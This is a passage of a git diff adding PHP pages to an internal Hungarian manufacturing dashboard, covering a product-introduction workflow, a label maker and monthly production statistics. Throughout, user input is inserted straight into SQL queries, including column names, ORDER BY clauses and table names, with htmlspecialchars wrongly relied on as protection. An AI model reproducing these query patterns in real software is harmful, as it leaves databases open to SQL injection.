explode("|", $item_introduction["is_tool_can_be_tested"])[0]; + $sql = mysqli_query($conn,"SELECT full_name FROM users WHERE uid = '$is_tool_can_be_tested_uid'"); + $is_tool_can_be_tested_name = $coderclass->decode(mysqli_fetch_array($sql)[0], "TIT4"); + $is_tool_can_be_tested_time = explode("|", $item_introduction["is_tool_can_be_tested"])[1]; + + $is_tool_can_be_tested = $is_tool_can_be_tested_name." - ".date("Y-m-d H:i:s", $is_tool_can_be_tested_time); + } + + $json = json_encode([ + "status" => "ok", + "is_tool_ok" => $is_tool_ok, + "is_tool_created" => $is_tool_created, + "is_tool_can_be_tested" => $is_tool_can_be_tested, + "user_can_edit" => UserHasPerm("edit_item_introduction_tools_send") + ]); + } else { + $json = json_encode(["status" => "error", "message" => "A megadott cikkszámmal nem létezik bevezetési folyamat!"]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "OpenTesting") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $json = ""; + + $sql = mysqli_query($conn,"SELECT is_tested_in_car, is_production_ready FROM item_introduction WHERE item_id = '$item_id'"); + $item_introduction = mysqli_fetch_array($sql); + + if ($item_introduction) { + + $is_tested_in_car = ''; + $is_production_ready = ''; + + + if ($item_introduction["is_tested_in_car"] != null && $item_introduction["is_tested_in_car"] != "") { + $is_tested_in_car_uid = explode("|", $item_introduction["is_tested_in_car"])[0]; + $sql = mysqli_query($conn,"SELECT full_name FROM users WHERE uid = '$is_tested_in_car_uid'"); + $is_tested_in_car_name = $coderclass->decode(mysqli_fetch_array($sql)[0], "TIT4"); + $is_tested_in_car_time = explode("|", $item_introduction["is_tested_in_car"])[1]; + + $is_tested_in_car = $is_tested_in_car_name." - ".date("Y-m-d H:i:s", $is_tested_in_car_time); + } + + if ($item_introduction["is_production_ready"] != null && $item_introduction["is_production_ready"] != "") { + $is_production_ready_uid = explode("|", $item_introduction["is_production_ready"])[0]; + $sql = mysqli_query($conn,"SELECT full_name FROM users WHERE uid = '$is_production_ready_uid'"); + $is_production_ready_name = $coderclass->decode(mysqli_fetch_array($sql)[0], "TIT4"); + $is_production_ready_time = explode("|", $item_introduction["is_production_ready"])[1]; + + if (count(explode("|", $item_introduction["is_production_ready"])) == 3) { + $is_production_ready = "".explode("|", $item_introduction["is_production_ready"])[2]." - ".$is_production_ready_name." - ".date("Y-m-d H:i:s", $is_production_ready_time); + } else { + $is_production_ready = $is_production_ready_name." - ".date("Y-m-d H:i:s", $is_production_ready_time); + } + } + + + $json = json_encode([ + "status" => "ok", + "is_tested_in_car" => $is_tested_in_car, + "is_production_ready" => $is_production_ready, + "user_can_edit" => UserHasPerm("edit_item_introduction_testing") + ]); + } else { + $json = json_encode(["status" => "error", "message" => "A megadott cikkszámmal nem létezik bevezetési folyamat!"]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "OpenLastStatement") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $json = ""; + + $sql = mysqli_query($conn,"SELECT is_kulcssoft_ready, is_on_web, is_data_valid, is_export_ready FROM item_introduction WHERE item_id = '$item_id'"); + $item_introduction = mysqli_fetch_array($sql); + + if ($item_introduction) { + + $is_kulcssoft_ready = ''; + $is_on_web = ''; + $is_data_valid = ''; + $is_export_ready = ''; + + if ($item_introduction["is_kulcssoft_ready"] != null && $item_introduction["is_kulcssoft_ready"] != "") { + $is_kulcssoft_ready_uid = explode("|", $item_introduction["is_kulcssoft_ready"])[0]; + $sql = mysqli_query($conn,"SELECT full_name FROM users WHERE uid = '$is_kulcssoft_ready_uid'"); + $is_kulcssoft_ready_name = $coderclass->decode(mysqli_fetch_array($sql)[0], "TIT4"); + $is_kulcssoft_ready_time = explode("|", $item_introduction["is_kulcssoft_ready"])[1]; + + $is_kulcssoft_ready = $is_kulcssoft_ready_name." - ".date("Y-m-d H:i:s", $is_kulcssoft_ready_time); + } + + if ($item_introduction["is_on_web"] != null && $item_introduction["is_on_web"] != "") { + $is_on_web_uid = explode("|", $item_introduction["is_on_web"])[0]; + $sql = mysqli_query($conn,"SELECT full_name FROM users WHERE uid = '$is_on_web_uid'"); + $is_on_web_name = $coderclass->decode(mysqli_fetch_array($sql)[0], "TIT4"); + $is_on_web_time = explode("|", $item_introduction["is_on_web"])[1]; + + $is_on_web = $is_on_web_name." - ".date("Y-m-d H:i:s", $is_on_web_time); + } + + if ($item_introduction["is_data_valid"] != null && $item_introduction["is_data_valid"] != "") { + $is_data_valid_uid = explode("|", $item_introduction["is_data_valid"])[0]; + $sql = mysqli_query($conn,"SELECT full_name FROM users WHERE uid = '$is_data_valid_uid'"); + $is_data_valid_name = $coderclass->decode(mysqli_fetch_array($sql)[0], "TIT4"); + $is_data_valid_time = explode("|", $item_introduction["is_data_valid"])[1]; + + $is_data_valid = $is_data_valid_name." - ".date("Y-m-d H:i:s", $is_data_valid_time); + } + + if ($item_introduction["is_export_ready"] != null && $item_introduction["is_export_ready"] != "") { + $is_export_ready_uid = explode("|", $item_introduction["is_export_ready"])[0]; + $sql = mysqli_query($conn,"SELECT full_name FROM users WHERE uid = '$is_export_ready_uid'"); + $is_export_ready_name = $coderclass->decode(mysqli_fetch_array($sql)[0], "TIT4"); + $is_export_ready_time = explode("|", $item_introduction["is_export_ready"])[1]; + + $is_export_ready = $is_export_ready_name." - ".date("Y-m-d H:i:s", $is_export_ready_time); + } + + $json = json_encode([ + "status" => "ok", + "is_kulcssoft_ready" => $is_kulcssoft_ready, + "is_on_web" => $is_on_web, + "is_data_valid" => $is_data_valid, + "is_export_ready" => $is_export_ready, + "user_can_edit" => UserHasPerm("edit_item_introduction_basic_data") + ]); + } else { + $json = json_encode(["status" => "error", "message" => "A megadott cikkszámmal nem létezik bevezetési folyamat!"]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "OpenFinal") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $all_information = array(); + + $Parameters = ["is_tool_ok", "is_tool_created", "is_tool_can_be_tested", "is_tested_in_car", "is_production_ready", "is_kulcssoft_ready", "is_on_web", "is_data_valid", "is_export_ready"]; + + for ($i=0; $i < count($Parameters); $i++) { + + $sql = mysqli_query($conn,"SELECT ".$Parameters[$i]." FROM item_introduction WHERE item_id = '$item_id'"); + $item_introduction = mysqli_fetch_array($sql); + + $this_uid = explode("|", $item_introduction[0])[0]; + $sql = mysqli_query($conn,"SELECT full_name FROM users WHERE uid = '$this_uid'"); + $this_name = $coderclass->decode(mysqli_fetch_array($sql)[0], "TIT4"); + $this_time = explode("|", $item_introduction[0])[1]; + + $temp = $this_name." - ".date("Y-m-d H:i:s", $this_time); + + $all_information = array_merge($all_information, [$Parameters[$i] => $temp]); + } + + $all_information = array_merge($all_information, ['status' => 'ok']); + $all_information = array_merge($all_information, ['user_can_edit' => UserHasPerm("edit_item_introduction_final")]); + echo json_encode($all_information); + } else if (htmlspecialchars($_POST["func"]) == "OpenComplete") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + + if (UserHasPerm('read_item_introduction') || UserHasPerm('edit_item_introduction_final')) { + $sql = mysqli_query($conn,"SELECT finalized_by, finalized_in FROM item_introduction WHERE item_id = '$item_id'"); + $item_introduction = mysqli_fetch_array($sql); + $this_uid = $item_introduction["finalized_by"]; + $sql = mysqli_query($conn,"SELECT full_name FROM users WHERE uid = '$this_uid'"); + $this_name = $coderclass->decode(mysqli_fetch_array($sql)[0], "TIT4"); + + $json = json_encode([ + "status" => "ok", + "finalized_by" => $this_name, + "finalized_in" => date("Y-m-d H:i:s", $item_introduction["finalized_in"]) + ]); + } else { + $json = json_encode(["status" => "error", "message" => "Jogosultság megtagadva! Önnek nincsen joga megtekinteni a lezárt Termék bevezetéseket!"]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "StatementEditor") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $statement_id = htmlspecialchars($_POST["statement_id"]); + $edit_to = htmlspecialchars($_POST["edit_to"]); + $input = htmlspecialchars($_POST["input"]); + + $json = ""; + + $userMustHaveThisPerm = "god_profile"; + if ($statement_id == "is_tool_ok" || $statement_id == "is_tool_created" || $statement_id == "is_tool_can_be_tested") { + $userMustHaveThisPerm = "edit_item_introduction_tools_send"; + } else if ($statement_id == "is_tested_in_car" || $statement_id == "is_production_ready") { + $userMustHaveThisPerm = "edit_item_introduction_testing"; + } else if ($statement_id == "is_kulcssoft_ready" || $statement_id == "is_on_web" || $statement_id == "is_data_valid" || $statement_id == "is_export_ready") { + $userMustHaveThisPerm = "edit_item_introduction_basic_data"; + } + + if (UserHasPerm($userMustHaveThisPerm)) { + $text = ""; + if ($edit_to == "true") { + $toupdate = $userID."|".(time()); + if ($input != "igen") { + $toupdate .= "|".$input; + $sql = mysqli_query($conn,"UPDATE item_introduction SET ".$statement_id." = '".$toupdate."' WHERE item_id = '$item_id'"); + $text = "".$input." - ".$userName." - ".date("Y-m-d H:i:s", (time())); + } else { + $sql = mysqli_query($conn,"UPDATE item_introduction SET ".$statement_id." = '".$toupdate."' WHERE item_id = '$item_id'"); + $text = $userName." - ".date("Y-m-d H:i:s", (time())); + } + + } else { + $sql = mysqli_query($conn,"UPDATE item_introduction SET ".$statement_id." = null WHERE item_id = '$item_id'"); + } + + $json = json_encode(["result" => "ok", "text" => $text]); + } else { + $json = json_encode(["result" => "Jogosultság megtagadva! Önnek nincsen joga ezt a nyilatkozat benyújtani!"]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "StartTesting") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $json = ""; + + $sql = mysqli_query($conn,"SELECT is_tool_ok, is_tool_created, is_tool_can_be_tested FROM item_introduction WHERE item_id = '$item_id'"); + $item_introduction = mysqli_fetch_array($sql); + + if ($item_introduction["is_tool_ok"] == null || $item_introduction["is_tool_ok"] == "" || $item_introduction["is_tool_created"] == null || $item_introduction["is_tool_created"] == "" ||$item_introduction["is_tool_can_be_tested"] == null || $item_introduction["is_tool_can_be_tested"] == "") { + $json = json_encode(["status" => "error", "message" => "Minden nyilatkozatot be kell nyújtani!"]); + } else if (UserHasPerm('edit_item_introduction_tools_send')) { + $json = json_encode(["status" => "ok"]); + $sql = mysqli_query($conn,"UPDATE item_introduction SET status = 'testing' WHERE item_id = '$item_id'"); + } else { + $json = json_encode(["status" => "error", "message" => "Jogosultság megtagadva! Önnek nincsen joga alap adatokat menteni!"]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "StartDeficit") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $json = ""; + + $sql = mysqli_query($conn,"SELECT is_tested_in_car, is_production_ready FROM item_introduction WHERE item_id = '$item_id'"); + $item_introduction = mysqli_fetch_array($sql); + + if ($item_introduction["is_tested_in_car"] == null || $item_introduction["is_tested_in_car"] == "" || $item_introduction["is_production_ready"] == null || $item_introduction["is_production_ready"] == "") { + $json = json_encode(["status" => "error", "message" => "Minden nyilatkozatot be kell nyújtani!"]); + } else if (count(explode("|", $item_introduction["is_production_ready"])) != 2) { + $json = json_encode(["status" => "error", "message" => "A Termék nem sorozatgyártható! Csak abban az esetben lehet folytatni, ha a termék sorozatgyártásba felvehető!"]); + } else if (UserHasPerm('edit_item_introduction_testing')) { + $json = json_encode(["status" => "ok"]); + $sql = mysqli_query($conn,"UPDATE item_introduction SET status = 'deficit' WHERE item_id = '$item_id'"); + } else { + $json = json_encode(["status" => "error", "message" => "Jogosultság megtagadva! Önnek nincsen joga alap adatokat menteni!"]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "StartLastStatement") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $json = ""; + + if (UserHasPerm('edit_item_introduction_basic_data')) { + $json = json_encode(["status" => "ok"]); + $sql = mysqli_query($conn,"UPDATE item_introduction SET status = 'last_statement' WHERE item_id = '$item_id'"); + } else { + $json = json_encode(["status" => "error", "message" => "Jogosultság megtagadva! Önnek nincsen joga alap adatokat menteni!"]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "StartFinal") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $json = ""; + + $sql = mysqli_query($conn,"SELECT is_kulcssoft_ready, is_on_web, is_data_valid, is_export_ready FROM item_introduction WHERE item_id = '$item_id'"); + $item_introduction = mysqli_fetch_array($sql); + + if ($item_introduction["is_kulcssoft_ready"] == null || $item_introduction["is_kulcssoft_ready"] == "" || $item_introduction["is_on_web"] == null || $item_introduction["is_on_web"] == "" || $item_introduction["is_data_valid"] == null || $item_introduction["is_data_valid"] == "" || $item_introduction["is_export_ready"] == null || $item_introduction["is_export_ready"] == "") { + $json = json_encode(["status" => "error", "message" => "Minden nyilatkozatot be kell nyújtani!"]); + } else if (UserHasPerm('edit_item_introduction_basic_data')) { + $json = json_encode(["status" => "ok"]); + $sql = mysqli_query($conn,"UPDATE item_introduction SET status = 'final' WHERE item_id = '$item_id'"); + } else { + $json = json_encode(["status" => "error", "message" => "Jogosultság megtagadva! Önnek nincsen joga alap adatokat menteni!"]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "StartComplete") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $json = ""; + + if (UserHasPerm('edit_item_introduction_final')) { + $json = json_encode(["status" => "ok"]); + $ctime = time(); + $sql = mysqli_query($conn,"UPDATE item_introduction SET status = 'complete', finalized_in = $ctime, finalized_by = $userID WHERE item_id = '$item_id'"); + + $_GET['type'] = 'daily'; + $_GET['item_id'] = $item_id; + $_GET['silent'] = true; + include '../managers/statistics.php'; + + $data = json_decode(file_get_contents($currentUrl."/managers/prdb.json"), true); + if ($data) { + foreach ($data["DBList"] as $table) { + $sqlcommand = 'UPDATE '.$table["ID"].' SET data_status = 1 WHERE item_id = "'.$item_id.'"'; + $sql = mysqli_query($conn,$sqlcommand); + } + } + } else { + $json = json_encode(["status" => "error", "message" => "Jogosultság megtagadva! Önnek nincsen joga alap adatokat menteni!"]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "filter" && UserHasPerm("read_item_introduction")) { + + if (!isset($_COOKIE['maxperpage'])) { + setcookie("maxperpage", "25", time() + (86400 * 90), "/"); + $maxperpage = "25"; + } else { + $maxperpage = $_COOKIE['maxperpage']; + } + + setcookie("maxperpage", strval($maxperpage), time() + (86400 * 90), "/"); + + $perpageselect = " + + + + + "; + $perpageselect = str_replace("value='".$maxperpage."'", "value='".$maxperpage."' selected", $perpageselect); + + $finalized_by = ''; + $query = "SELECT DISTINCT finalized_by FROM item_introduction WHERE status = 'complete' ORDER BY finalized_by ASC"; + if ($result = $conn->query($query)) { + while ($ccat = $result->fetch_assoc()) { + if ($ccat['finalized_by'] != null && $ccat['finalized_by'] != "") { + $this_uid = $ccat['finalized_by']; + $sql = mysqli_query($conn,"SELECT full_name FROM users WHERE uid = '$this_uid'"); + $this_name = $coderclass->decode(mysqli_fetch_array($sql)[0], "TIT4"); + $finalized_by .= ""; + } + } + } + + $json = json_encode(array( + 'finalized_by' => $finalized_by, + 'perpage' => $perpageselect, + 'result' => 'ok' + )); + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "table" && UserHasPerm("read_item_introduction")) { + $maxperpage = intval(htmlspecialchars($_POST["perpage"])); + $cpage = intval(htmlspecialchars($_POST["cpage"])); + $orderby = htmlspecialchars($_POST["orderby"]); + + $start_datetime = htmlspecialchars($_POST["start_datetime"]); + $end_datetime = htmlspecialchars($_POST["end_datetime"]); + $finalized_by = htmlspecialchars($_POST["finalized_by"]); + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + + $addquery = ""; + $isfirst = true; + + if ($cpage == 0) { + $cpage = 1; + } + setcookie("maxperpage", $maxperpage, time() + (86400 * 90), "/"); + + if ($finalized_by != "") { + $addquery = $addquery." WHERE finalized_by LIKE '%".$finalized_by."%'"; + $isfirst = false; + } + + if ($start_datetime != "") { + $timestamp = strtotime($start_datetime); + + if ($isfirst) { + $addquery = $addquery." WHERE finalized_in > '".$timestamp."'"; + $isfirst = false; + } else { + $addquery = $addquery." and finalized_in > '".$timestamp."'"; + } + } + + if ($end_datetime != "") { + $timestamp = strtotime($end_datetime); + + if ($isfirst) { + $addquery = $addquery." WHERE finalized_in < '".$timestamp."'"; + $isfirst = false; + } else { + $addquery = $addquery." and finalized_in < '".$timestamp."'"; + } + } + + if ($item_id != "") { + if ($isfirst) { + $addquery = $addquery." WHERE item_id LIKE '%".$item_id."%'"; + $isfirst = false; + } else { + $addquery = $addquery." and item_id LIKE '%".$item_id."%'"; + } + } + + if ($isfirst) { + $addquery = $addquery." WHERE status = 'complete'"; + $isfirst = false; + } else { + $addquery = $addquery." and status = 'complete'"; + } + + $sql = mysqli_query($conn,"SELECT COUNT(*) FROM item_introduction".$addquery); + $count = mysqli_fetch_array($sql)[0]; + + if ($orderby != "") { + $addquery = $addquery." ORDER BY ".$orderby; + if ($orderby == "finalized_in") { + $addquery .= " DESC"; + } + $isfirst = false; + } + + $maxpage = ceil($count / $maxperpage); + if (!($cpage >= 1 && $cpage <= $maxpage)) { + $cpage = 1; + } + + $limit = ($cpage - 1) * $maxperpage; + + $responseStr = ''; + $query = "SELECT item_id, finalized_in, finalized_by FROM item_introduction".$addquery." LIMIT $limit, $maxperpage"; + if ($result = $conn->query($query)) { + while ($c_item_introduction = $result->fetch_assoc()) { + + if ($responseStr != "") { + $responseStr .= "|%|"; + } + $this_uid = $c_item_introduction['finalized_by']; + $sql = mysqli_query($conn,"SELECT full_name FROM users WHERE uid = '$this_uid'"); + $this_name = $coderclass->decode(mysqli_fetch_array($sql)[0], "TIT4"); + + $responseStr .= $c_item_introduction['item_id'].'/!/'.date("Y. m. d.", $c_item_introduction['finalized_in']).'/!/'.$this_name; + } + } + + echo '{"result": "ok", "data": "'.$responseStr.'", "maxpage": "'.$maxpage.'", "cpage": "'.$cpage.'"}'; + + } + + exit(); +} else if (isset($_GET['saving']) && $_GET['saving'] == 1) { + header("Content-Type: application/json"); + $jsonData = file_get_contents("php://input"); + $SendedData = json_decode($jsonData, true); + $LocalData = json_decode(file_get_contents($currentUrl."/managers/prdb.json"), true); + + $item_id = $SendedData['item_id']; + + $result_list = []; + $parameters = []; + if ($LocalData && UserHasPerm("edit_item_introduction_basic_data")) { + foreach ($LocalData["DBList"] as $table) { + foreach ($SendedData as $key => $value) { + if (strpos($key, $table["ID"] . "_") === 0) { + $param = substr($key, strlen($table["ID"]) + 1); + $result_list[$table["ID"]][] = ['param' => $param, 'value' => $value]; + } + } + } + + if (!empty($result_list)) { + foreach ($result_list as $table_id => $parameters) { + $sql = mysqli_query($conn,"SELECT item_id FROM ".$table_id." WHERE item_id = '$item_id'"); + $test = mysqli_fetch_array($sql); + $ctimestamp = time(); + + if (!$test) { + $sql = mysqli_query($conn,"INSERT INTO ".$table_id."(item_id, uploader_uid, registration_date) VALUES ('".$item_id."', ".$userID.", ".$ctimestamp.")"); + } + foreach ($parameters as $param) { + $param_name = $param['param']; + $param_value = $param['value']; + if ($table_id == "pr_warehouse_parameters" && $param_name == "size" && $param_value != "") { + $boxsizeoptions = array_column($LocalData['BoxSizes'], 'Name'); + if (in_array($param_value, $boxsizeoptions, true)) { + $sql = mysqli_query($conn,"UPDATE ".$table_id." SET ".$param_name." = '".$param_value."' WHERE item_id = '".$item_id."'"); + } else { + die(json_encode(["status" => "Nem megfelelő doboz méretet adott meg!", "id" => "pr_warehouse_parameters_size"])); + } + } else { + $sql = mysqli_query($conn,"UPDATE ".$table_id." SET ".$param_name." = '".$param_value."' WHERE item_id = '".$item_id."'"); + } + } + + } + } + + } + + echo json_encode(["status" => "done"]); + exit(); +} + +?> + + + + + + + Kezelőfelület + + + + +
    +
    +

    Title

    +
    +
    +
    +
    +
    +
    +
    +
    +
    + + + +

    Termék (cikkszám) bevezetése

    + +
    + + +
    +

    Új termék hozzáadása

    Egy új termék bevezetésének elkezdése

    +
    +
    + '; + } + ?> + + + +


    + + + + + + + + + diff --git a/dashboard/labelmaker.php b/dashboard/labelmaker.php new file mode 100644 index 0000000..99dd0aa --- /dev/null +++ b/dashboard/labelmaker.php @@ -0,0 +1,758 @@ +query($query)) { + while ($row = $result->fetch_assoc()) { + $warehouses[] = $row; + } +} + +// Fóliás helyeket lekérése +$foil_places = []; +$foil_query = "SELECT foil_product_place FROM pr_warehouse_parameters WHERE foil_product_place IS NOT NULL AND foil_product_place != ''"; + +if ($result_foil = $conn->query($foil_query)) { + while ($row = $result_foil->fetch_assoc()) { + // Vesszővel elválasztott helyeket fel bontjuk + $places = array_map('trim', explode(',', $row['foil_product_place'])); + $foil_places = array_merge($foil_places, $places); + } +} + +// Duplikátumok eltávolítása, rendezés +$foil_places = array_unique($foil_places); +$foil_places = array_values($foil_places); + +function mixed_compare($a, $b) { + preg_match_all('/(\D+|\d+)/', $a, $a_parts); + preg_match_all('/(\D+|\d+)/', $b, $b_parts); + + $a_parts = $a_parts[0]; + $b_parts = $b_parts[0]; + + $i = 0; + while (isset($a_parts[$i]) && isset($b_parts[$i])) { + if (ctype_digit($a_parts[$i]) && ctype_digit($b_parts[$i])) { + $diff = intval($a_parts[$i]) - intval($b_parts[$i]); + if ($diff !== 0) { + return $diff; + } + } else { + $diff = strcmp($a_parts[$i], $b_parts[$i]); + if ($diff !== 0) { + return $diff; + } + } + $i++; + } + + return count($a_parts) - count($b_parts); +} + +// Használat usort-tal +usort($foil_places, 'mixed_compare'); + + +?> + + + + + + Raktár Címke Generátor + + + + + + + +
    +

    Raktárhely Címke Generátor

    + +
    +
    +
    + + +
    + + +
    + + +
    +
    + + +
    +
    + + +
    +
    + + +
    +
    +
    + + +
    + + + + diff --git a/dashboard/monthlystat.php b/dashboard/monthlystat.php new file mode 100644 index 0000000..7f7fc2c --- /dev/null +++ b/dashboard/monthlystat.php @@ -0,0 +1,2622 @@ += '$from_date 00:00:00' AND FROM_UNIXTIME(date_revenue) <= '$to_date 23:59:59'"); + + $parameters = mysqli_fetch_array($sql); + + echo json_encode(["result" => "ok", "data" => $parameters]); + } else if (htmlspecialchars($_POST["func"]) == "sportyProduction") { + $from_date = htmlspecialchars($_POST["from_date"]); + $to_date = htmlspecialchars($_POST["to_date"]); + $get_item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + + $query_item_id = ''; + if ($get_item_id != '') { $query_item_id = 'AND item_id LIKE "%'.$get_item_id.'%"'; } + + $sql = mysqli_query($conn,"SELECT + SUM(db_start) AS db_start, + SUM(db_cut_r) AS db_cut_r, + SUM(db_cut_l) AS db_cut_l, + SUM(db_press_r) AS db_press_r, + SUM(db_press_l) AS db_press_l, + SUM(db_revenue_bulk_r) AS db_revenue_bulk_r, + SUM(db_revenue_bulk_l) AS db_revenue_bulk_l, + SUM(db_table) AS db_table, + (SUM(db_cut_r) + SUM(db_cut_l)) - (SUM(db_revenue_bulk_r) + SUM(db_revenue_bulk_l)) AS db_scrap, + ((SUM(db_cut_r) + SUM(db_cut_l)) - (SUM(db_revenue_bulk_r) + SUM(db_revenue_bulk_l))) / (SUM(db_cut_r) + SUM(db_cut_l)) * 100 AS percent_scrap, + AVG(date_cutend - date_cut) AS cut_time, + AVG(date_pressend - date_press) AS press_time, + AVG(date_revenue - date_start) AS product_time, + SUM(date_cutend - date_cut) AS cut_time_sum, + SUM(date_pressend - date_press) AS press_time_sum, + SUM(date_revenue - date_start) AS product_time_sum, + SUM((tablesize_x * tablesize_y) / 1000000 * db_table) AS tablesize + FROM + production_sporty + WHERE + stage = 0 $query_item_id + AND FROM_UNIXTIME(date_revenue) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_revenue) <= '$to_date 23:59:59'"); + + $parameters = mysqli_fetch_array($sql); + + echo json_encode(["result" => "ok", "data" => $parameters]); + } else if (htmlspecialchars($_POST["func"]) == "injmoldProduction") { + $from_date = htmlspecialchars($_POST["from_date"]); + $to_date = htmlspecialchars($_POST["to_date"]); + $get_item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + + $query_item_id = ''; + if ($get_item_id != '') { $query_item_id = 'AND item_id LIKE "%'.$get_item_id.'%"'; } + + $sql = mysqli_query($conn,"SELECT + SUM(db_start) AS db_start, + SUM(db_process_r) AS db_process_r, + SUM(db_process_l) AS db_process_l, + SUM(db_clean_r) AS db_clean_r, + SUM(db_clean_l) AS db_clean_l, + SUM(db_revenue_bulk_r) AS db_revenue_bulk_r, + SUM(db_revenue_bulk_l) AS db_revenue_bulk_l, + SUM(db_granules_used) AS db_granules_used, + SUM(kwh_stop - kwh_start) AS kwh, + (SUM(db_process_r) + SUM(db_process_l)) - (SUM(db_revenue_bulk_r) + SUM(db_revenue_bulk_l)) AS db_scrap, + ((SUM(db_process_r) + SUM(db_process_l)) - (SUM(db_revenue_bulk_r) + SUM(db_revenue_bulk_l))) / (SUM(db_start) * 2) * 100 AS percent_scrap, + AVG(date_prepend - date_prep) AS prep_time, + AVG(date_processend - date_process) AS process_time, + AVG(date_cleanend - date_clean) AS clean_time, + AVG(date_revenue - date_start) AS product_time, + SUM(date_prepend - date_prep) AS prep_time_sum, + SUM(date_processend - date_process) AS process_time_sum, + SUM(date_cleanend - date_clean) AS clean_time_sum, + SUM(date_revenue - date_start) AS product_time_sum + FROM + production_injmold + WHERE + stage = 0 $query_item_id + AND FROM_UNIXTIME(date_revenue) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_revenue) <= '$to_date 23:59:59'"); + + $parameters = mysqli_fetch_array($sql); + + echo json_encode(["result" => "ok", "data" => $parameters]); + } else if (htmlspecialchars($_POST["func"]) == "boxingProduction") { + $from_date = htmlspecialchars($_POST["from_date"]); + $to_date = htmlspecialchars($_POST["to_date"]); + $get_item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + + $query_item_id = ''; + if ($get_item_id != '') { $query_item_id = 'AND item_id LIKE "%'.$get_item_id.'%"'; } + + $sql = mysqli_query($conn,"SELECT + SUM(CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^[0-9]+$' THEN db_revenue + ELSE 0 + END) AS db_revenue_classic, + SUM(CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^F[0-9]{4}$' THEN db_revenue + ELSE 0 + END) AS db_revenue_sporty, + SUM(CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^FR[0-9]{4}$' THEN db_revenue + ELSE 0 + END) AS db_revenue_injmold, + AVG(CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^[0-9]+$' THEN (date_warehouseend - date_start) + ELSE 0 + END) AS product_time_classic, + AVG(CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^F[0-9]{4}$' THEN (date_warehouseend - date_start) + ELSE 0 + END) AS product_time_sporty, + AVG(CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^FR[0-9]{4}$' THEN (date_warehouseend - date_start) + ELSE 0 + END) AS product_time_injmold, + SUM(CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^[0-9]+$' THEN (date_warehouseend - date_start) + ELSE 0 + END) AS product_time_classic_sum, + SUM(CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^F[0-9]{4}$' THEN (date_warehouseend - date_start) + ELSE 0 + END) AS product_time_sporty_sum, + SUM(CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^FR[0-9]{4}$' THEN (date_warehouseend - date_start) + ELSE 0 + END) AS product_time_injmold_sum + FROM + production_boxing + WHERE + stage = 0 $query_item_id + AND FROM_UNIXTIME(date_warehouseend) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_warehouseend) <= '$to_date 23:59:59'"); + + $parameters = mysqli_fetch_array($sql); + + echo json_encode(["result" => "ok", "data" => $parameters]); + } if (htmlspecialchars($_POST["func"]) == "classicDetails") { + $from_date = htmlspecialchars($_POST["from_date"]); + $to_date = htmlspecialchars($_POST["to_date"]); + $get_item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + + $query_item_id = ''; + if ($get_item_id != '') { $query_item_id = 'AND item_id LIKE "%'.$get_item_id.'%"'; } + + $sql = mysqli_query($conn,"SELECT + COALESCE(SUM(CASE WHEN date_cutend IS NOT NULL AND FROM_UNIXTIME(date_cutend) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_cutend) <= '$to_date 23:59:59' THEN db_cut_r ELSE 0 END), 0) AS db_cut_r, + COALESCE(SUM(CASE WHEN date_cutend IS NOT NULL AND FROM_UNIXTIME(date_cutend) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_cutend) <= '$to_date 23:59:59' THEN db_cut_l ELSE 0 END), 0) AS db_cut_l, + + COALESCE(SUM(CASE WHEN date_pressend IS NOT NULL AND FROM_UNIXTIME(date_pressend) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_pressend) <= '$to_date 23:59:59' THEN db_press_r ELSE 0 END), 0) AS db_press_r, + COALESCE(SUM(CASE WHEN date_pressend IS NOT NULL AND FROM_UNIXTIME(date_pressend) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_pressend) <= '$to_date 23:59:59' THEN db_press_l ELSE 0 END), 0) AS db_press_l, + + COALESCE(SUM(CASE WHEN date_processend IS NOT NULL AND FROM_UNIXTIME(date_processend) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_processend) <= '$to_date 23:59:59' THEN db_process_r ELSE 0 END), 0) AS db_process_r, + COALESCE(SUM(CASE WHEN date_processend IS NOT NULL AND FROM_UNIXTIME(date_processend) >= '$from_date 